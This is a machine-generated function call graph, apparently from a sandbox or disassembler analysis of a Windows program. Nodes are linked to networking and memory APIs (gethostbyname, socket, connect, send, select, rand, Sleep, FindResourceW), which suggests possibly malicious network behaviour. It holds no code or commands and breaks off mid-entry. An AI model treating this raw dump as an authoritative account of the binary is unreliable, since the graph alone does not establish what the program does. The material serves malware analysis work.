6372->6373 6374 11e974d 6373->6374 6376 11e9759 6373->6376 6378 11e9683 gethostbyname 6374->6378 6376->6371 6381 11e668a memset GetTickCount 6376->6381 6379 11e96c0 6378->6379 6380 11e9696 wsprintfA 6378->6380 6379->6376 6380->6379 6391 11e5a7e 6381->6391 6384 11e66ed 6386 11e5a7e 88 API calls 6384->6386 6385 11e66e4 6465 11e2068 6385->6465 6388 11e6715 6386->6388 6389 11e2068 closesocket 6388->6389 6390 11e66e9 6389->6390 6390->6371 6454 11e5a8f 6391->6454 6392 11e20b2 GetTickCount 6392->6454 6393 11e2ef5 16 API calls 6393->6454 6394 11e2f88 17 API calls 6394->6454 6397 11e2068 closesocket 6398 11e631c 6397->6398 6398->6384 6398->6385 6400 11e6355 6853 11e31fb 6400->6853 6402 11e6384 6404 11e63a9 6402->6404 6405 11e63cf 6402->6405 6403 11e20d0 GetProcessHeap HeapFree 6403->6454 6409 11e20d0 2 API calls 6404->6409 6408 11e20d0 2 API calls 6405->6408 6407 11e5a46 13 API calls 6407->6398 6410 11e6409 6408->6410 6455 11e632d 6409->6455 6410->6455 6882 11e1f74 6410->6882 6413 11e5c7a rand 6550 11e407b 6413->6550 6421 11e1000 GetProcessHeap RtlAllocateHeap 6421->6454 6422 11e2068 closesocket 6423 11e62f1 Sleep 6422->6423 6423->6454 6424 11e64db 6425 11e660f 6424->6425 6428 11e64f2 memcpy memcpy 6424->6428 6432 11e20d0 2 API calls 6425->6432 6426 11e6641 6426->6455 6427 11e6324 6850 11e20d0 6427->6850 6433 11e20d0 2 API calls 6428->6433 6432->6455 6448 11e6530 6433->6448 6434 11e632f 6437 11e20d0 2 API calls 6434->6437 6436 11e65a5 Sleep 6440 11e65ef 6436->6440 6441 11e65b8 6436->6441 6439 11e6338 6437->6439 6443 11e20d0 2 API calls 6439->6443 6442 11e20d0 2 API calls 6440->6442 6445 11e3dd7 17 API calls 6441->6445 6442->6455 6443->6455 6446 11e65eb 6445->6446 6446->6425 6446->6440 6448->6425 6448->6436 6898 11e3dd7 6448->6898 6449 11e5ca4 6449->6426 6449->6454 6449->6455 6583 11e42df 6449->6583 6607 11e489c 6449->6607 6650 11e4ba1 6449->6650 6658 11e51f3 6449->6658 6671 11e5333 6449->6671 6452 11e5e28 Sleep 6799 11e6727 socket ioctlsocket 6452->6799 6454->6392 6454->6393 6454->6394 6454->6398 6454->6400 6454->6402 6454->6403 6454->6413 6454->6421 6454->6422 6454->6427 6454->6434 6454->6452 6454->6455 6456 11e6727 socket ioctlsocket htons inet_addr connect 6454->6456 6457 11e3ca0 8 API calls 6454->6457 6458 11e60de Sleep 6454->6458 6460 11e6145 closesocket 6454->6460 6461 11e6228 closesocket 6454->6461 6469 11e3061 6454->6469 6485 11e330e 6454->6485 6520 11e35fa 6454->6520 6536 11e3ec8 6454->6536 6753 11e2547 6454->6753 6778 11e688f 6454->6778 6783 11e243f 6454->6783 6786 11e3b5d 6454->6786 6819 11e369d 6454->6819 6835 11e3c0a 6454->6835 6845 11e5a46 6454->6845 6455->6407 6456->6454 6457->6454 6803 11e2ef5 6458->6803 6460->6454 6461->6454 6466 11e206f 6465->6466 6467 11e2075 closesocket 6466->6467 6468 11e2085 6466->6468 6467->6466 6468->6390 6914 11e29ce 6469->6914 6473 11e3087 6473->6454 6474 11e3098 6475 11e30a1 6474->6475 6476 11e30b3 6474->6476 6477 11e20d0 2 API calls 6475->6477 6478 11e688f 3 API calls 6476->6478 6477->6473 6479 11e30c4 6478->6479 6480 11e30d4 6479->6480 6481 11e243f 5 API calls 6479->6481 6482 11e20d0 2 API calls 6480->6482 6481->6480 6483 11e30e3 6482->6483 6484 11e20d0 2 API calls 6483->6484 6484->6473 6950 11e2ccf 6485->6950 6488 11e2466 3 API calls 6489 11e3361 6488->6489 6492 11e336a 6489->6492 6956 11e1000 GetProcessHeap RtlAllocateHeap 6489->6956 6491 11e33c3 6491->6454 6496 11e20d0 2 API calls 6492->6496 6494 11e33e0 6495 11e33e9 6494->6495 6501 11e688f 3 API calls 6494->6501 6498 11e20d0 2 API calls 6495->6498 6510 11e3335 6496->6510 6497 11e337a 6499 11e3381 6497->6499 6500 11e338e memcpy 6497->6500 6498->6491 6503 11e20d0 2 API calls 6499->6503 6502 11e20d0 2 API calls 6500->6502 6505 11e3404 6501->6505 6504 11e33b1 6502->6504 6503->6492 6509 11e20d0 2 API calls 6504->6509 6506 11e3418 6505->6506 6508 11e243f 5 API calls 6505->6508 6507 11e20d0 2 API calls 6506->6507 6507->6495 6511 11e3414 6508->6511 6509->6510 6510->6491 6957 11e1000 GetProcessHeap RtlAllocateHeap 6510->6957 6511->6506 6512 11e3422 6511->6512 6958 11e1000 GetProcessHeap RtlAllocateHeap 6512->6958 6514 11e342f 6515 11e3452 memcpy 6514->6515 6516 11e3438 6514->6516 6515->6516 6517 11e20d0 2 API calls 6516->6517 6518 11e3443 6517->6518 6519 11e20d0 2 API calls 6518->6519 6519->6491 6960 11e2c1e 6520->6960 6524 11e3641 6525 11e365c 6524->6525 6526 11e364a 6524->6526 6528 11e688f 3 API calls 6525->6528 6527 11e20d0 2 API calls 6526->6527 6530 11e3630 6527->6530 6529 11e366d 6528->6529 6531 11e367d 6529->6531 6532 11e243f 5 API calls 6529->6532 6530->6454 6533 11e20d0 2 API calls 6531->6533 6532->6531 6534 11e368c 6533->6534 6535 11e20d0 2 API calls 6534->6535 6535->6530 6538 11e3ed6 6536->6538 6539 11e3f07 6538->6539 6540 11e3f0e 6538->6540 6983 11e3734 6538->6983 6539->6454 6541 11e35fa 14 API calls 6540->6541 6542 11e3f37 6541->6542 6542->6539 7012 11e1000 GetProcessHeap RtlAllocateHeap 6542->7012 6544 11e3f70 6544->6539 6545 11e4030 rand 6544->6545 6545->6545 6546 11e4044 6545->6546 7013 11e3863 6546->7013 6549 11e20d0 2 API calls 6549->6539 6551 11e3061 16 API calls 6550->6551 6553 11e40a1 6551->6553 6552 11e40a5 6552->6449 6553->6552 7058 11e1000 GetProcessHeap RtlAllocateHeap 6553->7058 6555 11e40b8 6555->6552 7059 11e1000 GetProcessHeap RtlAllocateHeap 6555->7059 6557 11e40d7 6558 11e2c1e 6 API calls 6557->6558 6563 11e4242 6557->6563 6565 11e411e 6558->6565 6559 11e20d0 2 API calls 6559->6552 6560 11e412f memcpy 6561 11e20d0 2 API calls 6560->6561 6561->6565 6562 11e20d0 2 API calls 6562->6563 6563->6559 6564 11e2c1e 6 API calls 6564->6565 6565->6560 6565->6564 6566 11e417f memcpy 6565->6566 6568 11e688f 3 API calls 6565->6568 6569 11e423a 6565->6569 6570 11e243f 5 API calls 6565->6570 6572 11e4247 6565->6572 6576 11e4125 6565->6576 6567 11e20d0 2 API calls 6566->6567 6567->6565 6568->6565 6571 11e20d0 2 API calls 6569->6571 6570->6565 6571->6563 7060 11e30fe 6572->7060 6575 11e4275 6577 11e20d0 2 API calls 6575->6577 6576->6562 6578 11e427a 6577->6578 6579 11e20d0 2 API calls 6578->6579 6580 11e4282 Sleep 6579->6580 6581 11e429d 6580->6581 6581->6552 6582 11e35fa 14 API calls 6581->6582 6582->6581 7092 11e1000 GetProcessHeap RtlAllocateHeap 6583->7092 6585 11e42ef 6586 11e4302 rand 6585->6586 6594 11e42fa 6585->6594 6587 11e2c1e 6 API calls 6586->6587 6606 11e434c 6587->6606 6588 11e1000 GetProcessHeap RtlAllocateHeap 6588->6606 6589 11e20d0 2 API calls 6590 11e480e 6589->6590 6591 11e20d0 2 API calls 6590->6591 6591->6594 6592 11e47ea 6593 11e20d0 2 API calls 6592->6593 6595 11e47f2 6593->6595 6594->6449 6595->6589 6596 11e438b memcpy 6596->6606 6597 11e2c1e 6 API calls 6597->6606 6598 11e43db memcpy 6601 11e20d0 2 API calls 6598->6601 6599 11e47e2 6600 11e20d0 2 API calls 6599->6600 6600->6592 6601->6606 6602 11e688f 3 API calls 6602->6606 6603 11e243f 5 API calls 6603->6606 6604 11e20d0 GetProcessHeap HeapFree 6604->6606 6606->6588 6606->6592 6606->6595 6606->6596 6606->6597 6606->6598 6606->6599 6606->6602 6606->6603 6606->6604 7093 11e3986 6606->7093 6608 11e2c1e 6 API calls 6607->6608 6609 11e48d8 6608->6609 6610 11e48df 6609->6610 7139 11e1000 GetProcessHeap RtlAllocateHeap 6609->7139 6610->6449 6612 11e4905 6614 11e4922 memcpy 6612->6614 6615 11e2c1e 6 API calls 6612->6615 6616 11e499f 6612->6616 6618 11e496f memcpy 6612->6618 6619 11e49ca 6612->6619 6627 11e49d2 6612->6627 6613 11e20d0 2 API calls 6617 11e4a04 6613->6617 6614->6612 6615->6612 7140 11e1000 GetProcessHeap RtlAllocateHeap 6616->7140 6621 11e20d0 2 API calls 6617->6621 6622 11e20d0 2 API calls 6618->6622 6625 11e20d0 2 API calls 6619->6625 6623 11e4a11 6621->6623 6622->6612 7141 11e1000 GetProcessHeap RtlAllocateHeap 6623->7141 6624 11e49a9 6624->6619 6628 11e49b0 6624->6628 6625->6627 6627->6613 6627->6617 6629 11e688f 3 API calls 6628->6629 6633 11e49c0 6629->6633 6630 11e4a1c 6630->6610 6631 11e3863 15 API calls 6630->6631 6634 11e4a47 6631->6634 6632 11e49c4 6636 11e20d0 2 API calls 6632->6636 6633->6632 6635 11e243f 5 API calls 6633->6635 6637 11e20d0 2 API calls 6634->6637 6635->6632 6638 11e49ed 6636->6638 6640 11e4a52 6637->6640 6639 11e20d0 2 API calls 6638->6639 6639->6627 6640->6610 7142 11e4820 6640->7142 6644 11e4aae 6645 11e3986 16 API calls 6644->6645 6646 11e4adc 6645->6646 6647 11e20d0 2 API calls 6646->6647 6648 11e4ae3 6647->6648 6649 11e20d0 2 API calls 6648->6649 6649->6610 6651 11e4bb7 6650->6651 7151 11e1000 GetProcessHeap RtlAllocateHeap 6651->7151 6653 11e4bd6 6654 11e4bdd 6653->6654 7152 11e4afe 6653->7152 6654->6449 6657 11e20d0 2 API calls 6657->6654 6659 11e520e 6658->6659 7158 11e4c1c 6659->7158 6661 11e524d 6662 11e20d0 2 API calls 6661->6662 6669 11e5255 6662->6669 6663 11e52a0 6665 11e20d0 2 API calls 6663->6665 6664 11e5248 6664->6661 6664->6663 6666 11e52a8 6665->6666 7213 11e50e0 6666->7213 6669->6449 6670 11e50e0 18 API calls 6670->6669 6672 11e3734 14 API calls 6671->6672 6673 11e535b 6672->6673 6674 11e5598 6673->6674 7235 11e1000 GetProcessHeap RtlAllocateHeap 6673->7235 6674->6449 6676 11e536b 6676->6674 6677 11e4afe 16 API calls 6676->6677 6678 11e53c5 6677->6678 6679 11e20d0 2 API calls 6678->6679 6680 11e53d0 6679->6680 6680->6674 6681 11e54de 6680->6681 7236 11e1000 GetProcessHeap RtlAllocateHeap 6680->7236 6681->6674 7238 11e1000 GetProcessHeap RtlAllocateHeap 6681->7238 6684 11e54ef 6684->6674 6686 11e4afe 16 API calls 6684->6686 6685 11e540e 6685->6674 6688 11e4afe 16 API calls 6685->6688 6687 11e5531 6686->6687 6689 11e20d0 2 API calls 6687->6689 6690 11e5474 6688->6690 6692 11e553c 6689->6692 6691 11e20d0 2 API calls 6690->6691 6694 11e547f 6691->6694 6692->6674 6696 11e55db 6692->6696 7239 11e1000 GetProcessHeap RtlAllocateHeap 6692->7239 6694->6674 7237 11e1000 GetProcessHeap RtlAllocateHeap 6694->7237 6695 11e562f 6695->6674 7241 11e1000 GetProcessHeap RtlAllocateHeap 6695->7241 6696->6674 6696->6695 7240 11e1000 GetProcessHeap RtlAllocateHeap 6696->7240 6700 11e5556 6700->6674 6703 11e4afe 16 API calls 6700->6703 6701 11e55f1 6701->6674 6706 11e4afe 16 API calls 6701->6706 6702 11e5499 6702->6674 6705 11e4afe 16 API calls 6702->6705 6708 11e558b 6703->6708 6704 11e5664 6704->6674 6707 11e4afe 16 API calls 6704->6707 6709 11e54d3 6705->6709 6710 11e5624 6706->6710 6711 11e569b 6707->6711 6712 11e55a0 6708->6712 6713 11e5590 6708->6713 6717 11e20d0 2 API calls 6709->6717 6715 11e20d0 2 API calls 6710->6715 6714 11e20d0 2 API calls 6711->6714 6718 11e4afe 16 API calls 6712->6718 6716 11e20d0 2 API calls 6713->6716 6720 11e56a5 6714->6720 6715->6695 6716->6674 6717->6681 6719 11e55d0 6718->6719 6721 11e20d0 2 API calls 6719->6721 6720->6674 7242 11e1000 GetProcessHeap RtlAllocateHeap 6720->7242 6721->6696 6723 11e56bf 6723->6674 6724 11e3986 16 API calls 6723->6724 6725 11e56fe 6724->6725 6726 11e20d0 2 API calls 6725->6726 6727 11e5705 6726->6727 6727->6674 6728 11e4c1c 17 API calls 6727->6728 6729 11e574a 6728->6729 6730 11e20d0 2 API calls 6729->6730 6731 11e57b3 6730->6731 7243 11e1000 GetProcessHeap RtlAllocateHeap 6731->7243 6733 11e57ef 6733->6674 6734 11e4afe 16 API calls 6733->6734 6735 11e58ad 6734->6735 6736 11e20d0 2 API calls 6735->6736 6737 11e58b7 6736->6737 6737->6674 6738 11e4820 16 API calls 6737->6738 6739 11e58f9 6737->6739 6738->6739 6739->6674 6740 11e5975 6739->6740 6741 11e4820 16 API calls 6739->6741 6740->6674 6742 11e4820 16 API calls 6740->6742 6741->6740 6743 11e59da 6742->6743 6743->6674 7244 11e1000 GetProcessHeap RtlAllocateHeap 6743->7244 6745 11e59e8 6745->6674 7245 11e1000 GetProcessHeap RtlAllocateHeap 6745->7245 6747 11e59f9 6747->6674 6748 11e330e 16 API calls 6747->6748 6749 11e5a2c 6748->6749 6750 11e20d0 2 API calls 6749->6750 6751 11e5a36 6750->6751 6752 11e20d0 2 API calls 6751->6752 6752->6674 7246 11e1000 GetProcessHeap RtlAllocateHeap 6753->7246 6755 11e255b 6774 11e2564 6755->6774 7247 11e24d0 6755->7247 6758 11e2589 6760 11e2466 3 API calls 6758->6760 6759 11e257f 6761 11e20d0 2 API calls 6759->6761 6762 11e25b2 6760->6762 6761->6774 6763 11e25b9 6762->6763 6764 11e25d2 6762->6764 6766 11e20d0 2 API calls 6763->6766 7253 11e1000 GetProcessHeap RtlAllocateHeap 6764->7253 6768 11e25c1 6766->6768 6767 11e25db 6769 11e25fe memcpy 6767->6769 6770 11e25e2 6767->6770 6771 11e20d0 2 API calls 6768->6771 6769->6770 6772 11e20d0 2 API calls 6770->6772 6771->6774 6773 11e25ea 6772->6773 6775 11e20d0 2 API calls 6773->6775 6774->6454 6776 11e25f2 6775->6776 6777 11e20d0 2 API calls 6776->6777 6777->6774 6779 11e68a0 memset select 6778->6779 6780 11e690e 6778->6780 6779->6780 6781 11e68f0 6779->6781 6780->6454 6781->6780 6782 11e68f4 send 6781->6782 6782->6780 7255 11e67af memset select 6783->7255 7264 11e1000 GetProcessHeap RtlAllocateHeap 6786->7264 6788 11e3b6d 6789 11e3b7b memset 6788->6789 6796 11e3b76 6788->6796 6790 11e3bab 6789->6790 6792 11e3bfd 6790->6792 6794 11e3bd7 6790->6794 7265 11e3469 6790->7265 6793 11e20d0 2 API calls 6792->6793 6793->6796 6795 11e20d0 2 API calls 6794->6795 6797 11e3bdf 6795->6797 6796->6454 6798 11e369d 13 API calls 6797->6798 6798->6796 6800 11e675c 6799->6800 6802 11e6757 6799->6802 6801 11e6762 htons inet_addr connect 6800->6801 6800->6802 6801->6802 6802->6454 7306 11e270a 6803->7306 6807 11e2f2c 6808 11e2f47 6807->6808 6809 11e2f35 6807->6809 6811 11e688f 3 API calls 6808->6811 6810 11e20d0 2 API calls 6809->6810 6812 11e2f1b 6810->6812 6813 11e2f58 6811->6813 6812->6454 6814 11e2f68 6813->6814 6815 11e243f 5 API calls 6813->6815 6816 11e20d0 2 API calls 6814->6816 6815->6814 6817 11e2f77 6816->6817 6818 11e20d0 2 API calls 6817->6818 6818->6812 7336 11e2620 6819->7336 6822 11e36c7 6822->6454 6824 11e36d8 6825 11e36e1 6824->6825 6826 11e36f3 6824->6826 6827 11e20d0 2 API calls 6825->6827 6828 11e688f 3 API calls 6826->6828 6827->6822 6829 11e3704 6828->6829 6830 11e243f 5 API calls 6829->6830 6833 11e3714 6829->6833 6830->6833 6831 11e20d0 2 API calls 6832 11e3723 6831->6832 6834 11e20d0 2 API calls 6832->6834 6833->6831 6834->6822 7360 11e1000 GetProcessHeap RtlAllocateHeap 6835->7360 6837 11e3c19 6838 11e3c27 memset 6837->6838 6840 11e3c22 6837->6840 6839 11e3c39 6838->6839 6839->6839 6841 11e3c4e memset 6839->6841 6840->6454 6842 11e3469 15 API calls 6841->6842 6843 11e3c84 6842->6843 6844 11e20d0 2 API calls 6843->6844 6844->6840 6846 11e30fe 13 API calls 6845->6846 6847 11e5a60 6846->6847 6848 11e31fb 13 API calls 6847->6848 6849 11e5a77 6848->6849 6849->6454 6851 11e20d6 GetProcessHeap HeapFree 6850->6851 6852 11e20e9 6850->6852 6851->6852 6852->6455 7361 11e1000 GetProcessHeap RtlAllocateHeap 6853->7361 6855 11e320c 6856 11e2466 3 API calls 6855->6856 6857 11e322a 6855->6857 6859 11e3250 6856->6859 6871 11e32a5 6857->6871 7363 11e1000 GetProcessHeap RtlAllocateHeap 6857->7363 6875 11e3257 6859->6875 7362 11e1000 GetProcessHeap RtlAllocateHeap 6859->7362 6861 11e32b9 6862 11e32c2 6861->6862 6863 11e32cc 6861->6863 6866 11e20d0 2 API calls 6862->6866 6869 11e688f 3 API calls 6863->6869 6864 11e20d0 2 API calls 6864->6857 6865 11e3267 6867 11e326d 6865->6867 6868 11e327a 6865->6868 6866->6871 6872 11e20d0 2 API calls 6867->6872 6870 11e20d0 2 API calls 6868->6870 6873 11e32de 6869->6873 6874 11e3296 6870->6874 6871->6397 6872->6875 6876 11e32ee 6873->6876 6878 11e243f 5 API calls 6873->6878 6877 11e20d0 2 API calls 6874->6877 6875->6864 6879 11e20d0 2 API calls 6876->6879 6877->6857 6878->6876 6880 11e32fd 6879->6880 6881 11e20d0 2 API calls 6880->6881 6881->6871 6883 11e1f93 6882->6883 6884 11e1fba 6883->6884 6885 11e1fc1 GetProcessHeap RtlAllocateHeap memcpy 6883->6885 6890 11e20ea 6884->6890 6885->6884 6886 11e1feb memcpy 6885->6886 6886->6884 6887 11e2003 memcpy 6886->6887 6887->6884 6888 11e201f memcpy 6887->6888 6888->6884 6889 11e203f memcpy 6888->6889 6889->6884 6891 11e2102 FindResourceW 6890->6891 6893 11e2121 6890->6893 6892 11e2116 6891->6892 6891->6893 6894 11e85d0 12 API calls 6892->6894 6896 11e2129 6893->6896 7364 11e1000 GetProcessHeap RtlAllocateHeap 6893->7364 6894->6893 6896->6455 6897 11e1000 GetProcessHeap RtlAllocateHeap 6896->6897 6897->6424 6899 11e3deb 6898->6899 6900 11e3de3 6898->6900 7365 11e1000 GetProcessHeap RtlAllocateHeap 6899->7365 6900->6448 6902 11e3e00 memcpy 6903 11e3e37 6902->6903 6904 11e330e 16 API calls 6903->6904 6905 11e3e87 6904->6905 6906 11e3e8c 6905->6906 6907 11e3ea1 6905->6907 6908 11e20d0 2 API calls 6906->6908 6909 11e20d0 2 API calls 6907->6909 6910 11e3e94 6908->6910 6911 11e3ea9 6909->6911 6912 11e20d0 2 API calls 6910->6912 6913 11e20d0 2 API calls 6911->6913 6912->6900 6913->6900 6941 11e1000 GetProcessHeap RtlAllocateHeap 6914->6941 6916 11e29df 6917 11e29ec memcpy 6916->6917 6939 11e2a91 6916->6939 6918 11e2a01 6917->6918 6918->6918 6942 11e1000 GetProcessHeap RtlAllocateHeap 6918->6942 6920 11e2a10 6921 11e2a1b memcpy 6920->6921 6922 11e2a16 6920->6922 6921->6922 6923 11e2a89 6922->6923 6943 11e2466 6922->6943 6925 11e20d0 2 API calls 6923->6925 6925->6939 6927 11e2a81 6930 11e20d0 2 API calls 6927->6930 6928 11e2a9a 6948 11e1000 GetProcessHeap RtlAllocateHeap 6928->6948 6930->6923 6931 11e2aa3 6932 11e2ac5 memcpy 6931->6932 6933 11e2aa9 6931->6933 6932->6933 6934 11e20d0 2 API calls 6933->6934 6935 11e2ab1 6934->6935 6936 11e20d0 2 API calls 6935->6936 6937 11e2ab9 6936->6937 6938 11e20d0 2 API calls 6937->6938 6938->6939 6939->6473 6940 11e1000 GetProcessHeap RtlAllocateHeap 6939->6940 6940->6474 6941->6916 6942->6920 6949 11e1000 GetProcessHeap RtlAllocateHeap 6943->6949 6945 11e2471 6946 11e24cb 6945->6946 6947 11e2477 htons 6945->6947 6946->6927 6946->6928 6947->6946 6948->6931 6949->6945 6951 11e2cdb 6950->6951 6955 11e2ce1 6951->6955 6959 11e1000 GetProcessHeap RtlAllocateHeap 6951->6959 6953 11e2cfe 6954 11e2d67 memcpy 6953->6954 6953->6955 6954->6955 6955->6488 6955->6510 6956->6497 6957->6494 6958->6514 6959->6953 6977 11e2adf 6960->6977 6963 11e2466 3 API calls 6964 11e2c67 6963->6964 6974 11e2c6e 6964->6974 6981 11e1000 GetProcessHeap RtlAllocateHeap 6964->6981 6966 11e2c7c 6968 11e2c97 memcpy 6966->6968 6969 11e2c83 6966->6969 6967 11e20d0 2 API calls 6970 11e2c93 6967->6970 6971 11e20d0 2 API calls 6968->6971 6972 11e20d0 2 API calls 6969->6972 6970->6530 6976 11e1000 GetProcessHeap RtlAllocateHeap 6970->6976 6973 11e2cbd 6971->6973 6972->6974 6975 11e20d0 2 API calls 6973->6975 6974->6967 6975->6970 6976->6524 6978 11e2af6 6977->6978 6982 11e1000 GetProcessHeap RtlAllocateHeap 6978->6982 6980 11e2b0f 6980->6963 6980->6970 6981->6966 6982->6980 7042 11e2d82 6983->7042 6986 11e2466 3 API calls 6987 11e3781 6986->6987 7001 11e378a 6987->7001 7046 11e1000 GetProcessHeap RtlAllocateHeap 6987->7046 6989 11e37f7 6993 11e380a 6989->6993 6994 11e3800 6989->6994 6991 11e379a 6996 11e37ae memcpy 6991->6996 6997 11e37a1 6991->6997 6992 11e20d0 2 API calls 7008 11e3752 6992->7008 6998 11e688f 3 API calls 6993->6998 6995 11e20d0 2 API calls 6994->6995 7011 11e37e3 6995->7011 7000 11e20d0 2 API calls 6996->7000 6999 11e20d0 2 API calls 6997->6999 7002 11e381b 6998->7002 6999->7001 7003 11e37d1 7000->7003 7001->6992 7005 11e243f 5 API calls 7002->7005 7007 11e382b 7002->7007 7004 11e20d0 2 API calls 7003->7004 7004->7008 7005->7007 7006 11e20d0 2 API calls 7009 11e383a 7006->7009 7007->7006 7008->7011 7047 11e1000 GetProcessHeap RtlAllocateHeap 7008->7047 7010 11e20d0 2 API calls 7009->7010 7010->7011 7011->6538 7012->6544 7049 11e2e30 7013->7049 7016 11e2466 3 API calls 7018 11e38bc 7016->7018 7017 11e388d 7019 11e391d 7017->7019 7056 11e1000 GetProcessHeap RtlAllocateHeap 7017->7056 7020 11e38c5 7018->7020 7055 11e1000 GetProcessHeap RtlAllocateHeap 7018->7055 7019->6549 7026 11e20d0 2 API calls 7020->7026 7023 11e3931 7024 11e393a 7023->7024 7025 11e3944 7023->7025 7029 11e20d0 2 API calls 7024->7029 7028 11e688f 3 API calls 7025->7028 7026->7017 7027 11e38d8 7030 11e38eb memcpy 7027->7030 7031 11e38de 7027->7031 7033 11e3956 7028->7033 7029->7019 7034 11e20d0 2 API calls 7030->7034 7032 11e20d0 2 API calls 7031->7032 7032->7020 7035 11e3966 7033->7035 7037 11e243f 5 API calls 7033->7037 7036 11e390e 7034->7036 7039 11e20d0 2 API calls 7035->7039 7038 11e20d0 2 API calls 7036->7038 7037->7035 7038->7017 7040 11e3975 7039->7040 7041 11e20d0 2 API calls 7040->7041 7041->7019 7043 11e2d96 7042->7043 7048 11e1000 GetProcessHeap RtlAllocateHeap 7043->7048 7045 11e2dc7 7045->6986 7045->7008 7046->6991 7047->6989 7048->7045 7050 11e2e38 7049->7050 7053 11e2e3e 7050->7053 7057 11e1000 GetProcessHeap RtlAllocateHeap 7050->7057 7052 11e2e61 7052->7053 7054 11e2ed7 memcpy 7052->7054 7053->7016 7053->7017 7054->7053 7055->7027 7056->7023 7057->7052 7058->6555 7059->6557 7089 11e1000 GetProcessHeap RtlAllocateHeap 7060->7089 7062 11e3111 7063 11e2466 3 API calls 7062->7063 7065 11e3118 7062->7065 7064 11e313e 7063->7064 7082 11e3145 7064->7082 7090 11e1000 GetProcessHeap RtlAllocateHeap 7064->7090 7088 11e3192 7065->7088 7091 11e1000 GetProcessHeap RtlAllocateHeap 7065->7091 7068 11e31a6 7070 11e31af 7068->7070 7071 11e31b9 7068->7071 7069 11e3155 7074 11e315b 7069->7074 7075 11e3168 7069->7075 7076 11e20d0 2 API calls 7070->7076 7073 11e688f 3 API calls 7071->7073 7072 11e20d0 2 API calls 7072->7065 7077 11e31cb 7073->7077 7079 11e20d0 2 API calls 7074->7079 7078 11e20d0 2 API calls 7075->7078 7076->7088 7081 11e31db 7077->7081 7083 11e243f 5 API calls 7077->7083 7080 11e3183 7078->7080 7079->7082 7084 11e20d0 2 API calls 7080->7084 7085 11e20d0 2 API calls 7081->7085 7082->7072 7083->7081 7084->7065 7086 11e31ea 7085->7086 7087 11e20d0 2 API calls 7086->7087 7087->7088 7088->6575 7088->6576 7089->7062 7090->7069 7091->7068 7092->6585 7094 11e3999 7093->7094 7098 11e399e 7094->7098 7135 11e1000 GetProcessHeap RtlAllocateHeap 7094->7135 7096 11e39af 7096->7098 7099 11e39e4 memcpy 7096->7099 7097 11e2466 3 API calls 7100 11e3a30 7097->7100 7098->7097 7113 11e3a04 7098->7113 7099->7098 7119 11e3a39 7100->7119 7136 11e1000 GetProcessHeap RtlAllocateHeap 7100->7136 7101 11e3b3d 7103 11e688f 3 API calls 7101->7103 7102 11e3aa8 7137 11e1000 GetProcessHeap RtlAllocateHeap 7102->7137 7128 11e3af3 7103->7128 7106 11e3ab2 7109 11e3ac5 7106->7109 7110 11e3abb 7106->7110 7107 11e3a4c 7111 11e3a53 7107->7111 7112 11e3a60 memcpy 7107->7112 7108 11e20d0 2 API calls 7108->7113 7114 11e688f 3 API calls 7109->7114 7117 11e20d0 2 API calls 7110->7117 7116 11e20d0 2 API calls 7111->7116 7115 11e20d0 2 API calls 7112->7115 7113->7101 7113->7102 7121 11e3a94 7113->7121 7123 11e3ad7 7114->7123 7120 11e3a82 7115->7120 7116->7119 7117->7121 7118 11e20d0 2 API calls 7118->7121 7119->7108 7122 11e20d0 2 API calls 7120->7122 7121->6606 7122->7113 7124 11e3aeb 7123->7124 7125 11e243f 5 API calls 7123->7125 7126 11e20d0 2 API calls 7124->7126 7127 11e3ae7 7125->7127 7126->7128 7127->7124 7129 11e3b02 7127->7129 7128->7118 7138 11e1000 GetProcessHeap RtlAllocateHeap 7129->7138 7131 11e3b0f 7132 11e3b18 memcpy 7131->7132 7133 11e3b30 7131->7133 7132->7133 7134 11e20d0 2 API calls 7133->7134 7134->7128 7135->7096 7136->7107 7137->7106 7138->7131 7139->6612 7140->6624 7141->6630 7150 11e1000 GetProcessHeap RtlAllocateHeap 7142->7150 7144 11e4837 7145 11e483e 7144->7145 7146 11e3986 16 API calls 7144->7146 7145->6610 7149 11e1000 GetProcessHeap RtlAllocateHeap 7145->7149 7147 11e488a 7146->7147 7148 11e20d0 2 API calls 7147->7148 7148->7145 7149->6644 7150->7144 7151->6653 7153 11e4b15 7152->7153 7154 11e4820 16 API calls 7153->7154 7156 11e4b5d 7153->7156 7157 11e4b59 7153->7157 7154->7157 7155 11e3986 16 API calls 7155->7156 7156->6657 7157->7155 7157->7156 7159 11e4c40 7158->7159 7226 11e1000 GetProcessHeap RtlAllocateHeap 7159->7226 7161 11e4c59 7162 11e4afe 16 API calls 7161->7162 7212 11e4c60 7161->7212 7163 11e4cb7 7162->7163 7164 11e20d0 2 API calls 7163->7164 7166 11e4cc2 7164->7166 7165 11e4da2 7165->7212 7229 11e1000 GetProcessHeap RtlAllocateHeap 7165->7229 7166->7165 7166->7212 7227 11e1000 GetProcessHeap RtlAllocateHeap 7166->7227 7169 11e4db3 7170 11e4afe 16 API calls 7169->7170 7169->7212 7172 11e4def 7170->7172 7171 11e4ce6 7173 11e4afe 16 API calls 7171->7173 7171->7212 7174 11e20d0 2 API calls 7172->7174 7175 11e4d3c 7173->7175 7177 11e4dfa 7174->7177 7176 11e20d0 2 API calls 7175->7176 7178 11e4d47 7176->7178 7179 11e4e94 7177->7179 7177->7212 7230 11e1000 GetProcessHeap RtlAllocateHeap 7177->7230 7178->7212 7228 11e1000 GetProcessHeap RtlAllocateHeap 7178->7228 7181 11e4ee9 7179->7181 7179->7212 7231 11e1000 GetProcessHeap RtlAllocateHeap 7179->7231 7181->7212 7232 11e1000 GetProcessHeap RtlAllocateHeap 7181->7232 7182 11e4e1a 7188 11e4afe 16 API calls 7182->7188 7182->7212 7186 11e4f0b 7193 11e3986 16 API calls 7186->7193 7186->7212 7187 11e4d63 7191 11e4afe 16 API calls 7187->7191 7187->7212 7190 11e4e4d 7188->7190 7189 11e4eae 7192 11e4afe 16 API calls 7189->7192 7189->7212 7195 11e4e52 7190->7195 7196 11e4e5f 7190->7196 7194 11e4d97 7191->7194 7197 11e4edf 7192->7197 7198 11e4f43 7193->7198 7201 11e20d0 2 API calls 7194->7201 7199 11e20d0 2 API calls 7195->7199 7203 11e4afe 16 API calls 7196->7203 7200 11e20d0 2 API calls 7197->7200 7202 11e20d0 2 API calls 7198->7202 7199->7212 7200->7181 7201->7165 7205 11e4f4d 7202->7205 7204 11e4e89 7203->7204 7206 11e20d0 2 API calls 7204->7206 7205->7212 7233 11e1000 GetProcessHeap RtlAllocateHeap 7205->7233 7206->7179 7208 11e4f7e 7209 11e4f99 memcpy 7208->7209 7210 11e4f87 7208->7210 7209->7210 7211 11e20d0 2 API calls 7210->7211 7211->7212 7212->6664 7234 